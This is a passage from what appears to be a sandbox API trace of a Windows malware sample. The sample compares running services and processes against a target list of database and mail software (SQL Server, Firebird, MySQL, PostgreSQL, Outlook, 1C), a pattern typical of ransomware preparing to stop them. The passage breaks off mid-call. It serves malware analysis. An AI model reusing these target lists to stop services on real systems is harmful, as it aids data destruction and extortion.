[0033.105] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0033.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0033.105] lstrlenW (lpString="nsi") returned 3 [0033.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0033.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0033.106] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0033.106] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0033.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0033.106] lstrlenW (lpString="PcaSvc") returned 6 [0033.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0033.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0033.106] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0033.106] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0033.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0033.106] lstrlenW (lpString="PlugPlay") returned 8 [0033.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0033.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0033.106] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0033.106] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0033.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0033.106] lstrlenW (lpString="Power") returned 5 [0033.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0033.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0033.106] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0033.106] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0033.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0033.106] lstrlenW (lpString="ProfSvc") returned 7 [0033.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0033.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0033.106] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0033.106] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0033.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0033.106] lstrlenW (lpString="RpcEptMapper") returned 12 [0033.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0033.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0033.106] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0033.106] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0033.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0033.106] lstrlenW (lpString="RpcSs") returned 5 [0033.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0033.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0033.107] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0033.107] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0033.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0033.107] lstrlenW (lpString="SamSs") returned 5 [0033.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0033.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0033.107] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0033.107] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0033.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0033.107] lstrlenW (lpString="Schedule") returned 8 [0033.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0033.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0033.107] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0033.107] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0033.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0033.107] lstrlenW (lpString="SENS") returned 4 [0033.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0033.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0033.107] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0033.107] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0033.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0033.107] lstrlenW (lpString="ShellHWDetection") returned 16 [0033.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0033.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0033.107] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0033.107] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0033.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0033.107] lstrlenW (lpString="Spooler") returned 7 [0033.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0033.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0033.107] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0033.107] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0033.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0033.108] lstrlenW (lpString="SysMain") returned 7 [0033.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0033.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0033.108] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0033.108] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0033.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0033.108] lstrlenW (lpString="Themes") returned 6 [0033.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0033.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0033.108] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0033.108] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0033.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0033.108] lstrlenW (lpString="TrkWks") returned 6 [0033.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0033.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0033.108] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0033.108] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0033.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0033.108] lstrlenW (lpString="UxSms") returned 5 [0033.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0033.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0033.108] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0033.108] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0033.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0033.108] lstrlenW (lpString="WdiServiceHost") returned 14 [0033.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0033.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0033.108] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0033.108] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0033.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0033.108] lstrlenW (lpString="WdiSystemHost") returned 13 [0033.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0033.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0033.108] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0033.108] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0033.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0033.109] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0033.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0033.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0033.109] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0033.109] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0033.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0033.109] lstrlenW (lpString="Winmgmt") returned 7 [0033.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0033.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0033.109] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0033.109] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0033.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0033.109] lstrlenW (lpString="WPDBusEnum") returned 10 [0033.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0033.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0033.109] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0033.109] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0033.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0033.109] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ef27d0 | out: hHeap=0x570000) returned 1 [0033.109] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x190 [0033.113] Process32FirstW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0033.113] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0033.114] lstrlenW (lpString="System") returned 6 [0033.114] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0033.114] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0033.114] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0033.114] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0033.114] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0033.114] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0033.114] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0033.114] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0033.115] lstrlenW (lpString="smss.exe") returned 8 [0033.115] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0033.115] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0033.115] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0033.115] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0033.115] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0033.115] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0033.115] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0033.115] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0033.116] lstrlenW (lpString="csrss.exe") returned 9 [0033.116] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0033.116] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0033.116] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0033.116] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0033.116] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0033.116] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0033.116] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0033.116] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0033.117] lstrlenW (lpString="wininit.exe") returned 11 [0033.117] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0033.117] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0033.117] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0033.117] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0033.117] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0033.117] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0033.117] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0033.117] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0033.117] lstrlenW (lpString="csrss.exe") returned 9 [0033.117] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0033.118] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0033.118] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0033.118] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0033.118] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0033.118] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0033.118] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0033.118] lstrlenW (lpString="winlogon.exe") returned 12 [0033.118] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0033.119] lstrlenW (lpString="services.exe") returned 12 [0033.119] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0033.120] lstrlenW (lpString="lsass.exe") returned 9 [0033.120] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0033.120] lstrlenW (lpString="lsm.exe") returned 7 [0033.120] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.121] lstrlenW (lpString="svchost.exe") returned 11 [0033.121] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.122] lstrlenW (lpString="svchost.exe") returned 11 [0033.122] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.122] lstrlenW (lpString="svchost.exe") returned 11 [0033.122] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.123] lstrlenW (lpString="svchost.exe") returned 11 [0033.123] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x57, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.124] lstrlenW (lpString="svchost.exe") returned 11 [0033.124] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0033.125] lstrlenW (lpString="audiodg.exe") returned 11 [0033.125] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.125] lstrlenW (lpString="svchost.exe") returned 11 [0033.125] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.126] lstrlenW (lpString="svchost.exe") returned 11 [0033.126] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0033.130] lstrlenW (lpString="dwm.exe") returned 7 [0033.130] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0033.131] lstrlenW (lpString="explorer.exe") returned 12 [0033.131] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0033.131] lstrlenW (lpString="spoolsv.exe") returned 11 [0033.131] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0033.132] lstrlenW (lpString="taskhost.exe") returned 12 [0033.132] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.133] lstrlenW (lpString="svchost.exe") returned 11 [0033.133] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0033.133] lstrlenW (lpString="taskeng.exe") returned 11 [0033.133] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0033.134] lstrlenW (lpString="taskhost.exe") returned 12 [0033.134] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0033.135] lstrlenW (lpString="called.exe") returned 10 [0033.135] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0033.135] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0033.135] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0033.136] lstrlenW (lpString="analyst.exe") returned 11 [0033.136] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0033.137] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0033.137] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0033.137] lstrlenW (lpString="wages.exe") returned 9 [0033.137] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0033.138] lstrlenW (lpString="rand.exe") returned 8 [0033.138] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0033.381] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0033.381] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0033.381] lstrlenW (lpString="cottage.exe") returned 11 [0033.381] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0033.382] lstrlenW (lpString="pairs_spec.exe") returned 14 [0033.382] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0033.383] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0033.383] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0033.383] lstrlenW (lpString="observationshairy.exe") returned 21 [0033.383] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0033.384] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0033.384] Process32NextW (in: 